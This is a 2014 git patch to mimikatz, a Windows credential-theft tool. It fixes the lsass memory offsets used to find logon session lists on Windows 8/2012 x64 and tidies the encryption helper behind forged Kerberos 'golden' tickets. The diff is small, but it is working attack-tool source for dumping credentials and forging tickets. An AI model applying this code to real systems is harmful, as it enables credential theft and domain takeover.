From 029d72bdaf6814afe7cb1a1719956ae211fc755c Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Fri, 23 May 2014 19:22:32 +0200 Subject: [PATCH] Fixed LogonSessionListCount for 8.0/2012 x64 (Yeah, Joe tested on this platform ;)) --- mimikatz/modules/kerberos/kuhl_m_kerberos.c | 8 ++++---- mimikatz/modules/kerberos/kuhl_m_kerberos.h | 2 +- mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h | 2 +- mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c | 1 - mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 5 ++++- 5 files changed, 10 insertions(+), 8 deletions(-) diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos.c b/mimikatz/modules/kerberos/kuhl_m_kerberos.c index bcb655f..81c4a23 100644 --- a/mimikatz/modules/kerberos/kuhl_m_kerberos.c +++ b/mimikatz/modules/kerberos/kuhl_m_kerberos.c @@ -336,12 +336,12 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[]) return STATUS_SUCCESS; } -NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt) +NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt) { NTSTATUS status; PKERB_ECRYPT pCSystem; PVOID pContext; - DWORD bufferSize; + //DWORD bufferSize; status = CDLocateCSystem(eType, &pCSystem); if(NT_SUCCESS(status)) @@ -349,8 +349,8 @@ NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD status = pCSystem->Initialize(key, keySize, keyUsage, &pContext); if(NT_SUCCESS(status)) { - bufferSize = encrypt ? (dataSize + pCSystem->Size) : (dataSize /*- pCSystem->Size*/); - if(*output = LocalAlloc(LPTR, bufferSize)) + *outputSize = encrypt ? (dataSize + pCSystem->Size) : dataSize; + if(*output = LocalAlloc(LPTR, *outputSize)) { status = encrypt ? pCSystem->Encrypt(pContext, data, dataSize, *output, outputSize) : pCSystem->Decrypt(pContext, data, dataSize, *output, outputSize); if(!NT_SUCCESS(status)) diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos.h b/mimikatz/modules/kerberos/kuhl_m_kerberos.h index 381f57c..d8ee1b3 100644 --- a/mimikatz/modules/kerberos/kuhl_m_kerberos.h +++ b/mimikatz/modules/kerberos/kuhl_m_kerberos.h @@ -35,4 +35,4 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]); wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext); struct _DIRTY_ASN1_SEQUENCE_EASY * kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, PISID sid, LPCBYTE krbtgt, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups); -NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt); \ No newline at end of file +NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt); \ No newline at end of file diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h b/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h index cf6f4a4..d0c247b 100644 --- a/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h +++ b/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h @@ -34,7 +34,7 @@ typedef struct _USER_SESSION_KEY { UCHAR data[16]; } USER_SESSION_KEY; -typedef struct _KERB_SID_AND_ATTRIBUTES{ +typedef struct _KERB_SID_AND_ATTRIBUTES { PISID Sid; DWORD Attributes; } KERB_SID_AND_ATTRIBUTES, *PKERB_SID_AND_ATTRIBUTES; diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c index 0af4933..d56aced 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c @@ -314,7 +314,6 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000)) helper++; // yeah, really, I do that =) - securityStruct.hMemory = cLsass.hLsassMem; securityStruct.address = LogonSessionListCount; diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c index df5144f..d6a14c1 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c @@ -14,7 +14,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}}, {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -60}}, {KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -59}}, - {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -61}}, + {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -0}}, {KULL_M_WIN_MIN_BUILD_BLUE, {sizeof(PTRN_WIN81_LogonSessionList), PTRN_WIN81_LogonSessionList}, {0, NULL}, {-4, -53}}, }; #elif defined _M_IX86 @@ -37,6 +37,9 @@ PULONG LogonSessionListCount = NULL; BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib) { PVOID *pLogonSessionListCount = (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? NULL : ((PVOID *) &LogonSessionListCount); +#ifdef _M_X64 + LsaSrvReferences[4].Offsets.off1 = (pLib->Informations.TimeDateStamp > 0x53480000) ? -54 : -61; // 6.2 post or pre KB +#endif return kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, LsaSrvReferences, sizeof(LsaSrvReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LogonSessionList, pLogonSessionListCount, NULL); }